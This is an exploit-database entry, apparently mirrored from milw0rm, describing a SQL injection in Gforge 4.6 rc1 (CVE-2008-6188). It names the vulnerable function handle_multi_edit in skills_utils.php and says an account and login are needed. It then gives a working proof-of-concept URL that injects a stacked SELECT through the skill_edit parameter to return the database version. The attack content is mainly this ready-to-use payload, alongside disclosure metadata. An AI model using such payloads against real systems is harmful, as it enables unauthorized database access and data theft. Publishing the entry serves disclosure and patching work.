[] NeoSense
E X P L O I T S
title author type platform port cve id

Gforge 4.6 rc1 - 'skill_edit' SQL Injection

Author: beford
type: webapps
platform: php
port: 
date_added: 2008-10-08 
date_updated: 2016-12-26 
verified: 1 
codes: OSVDB-49147;CVE-2008-6188 
tags: 
aliases:  
screenshot_url:  
application_url: 
Gforge <= 4.6 rc1 skill_edit SQL injection

Vendor Notified: 2008-10-06
Impact: zomg!
Note: should work regardless magic_quotes_gpc setting.
Requires: Creating an account and be logged in
Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php

http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit

# milw0rm.com [2008-10-09]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.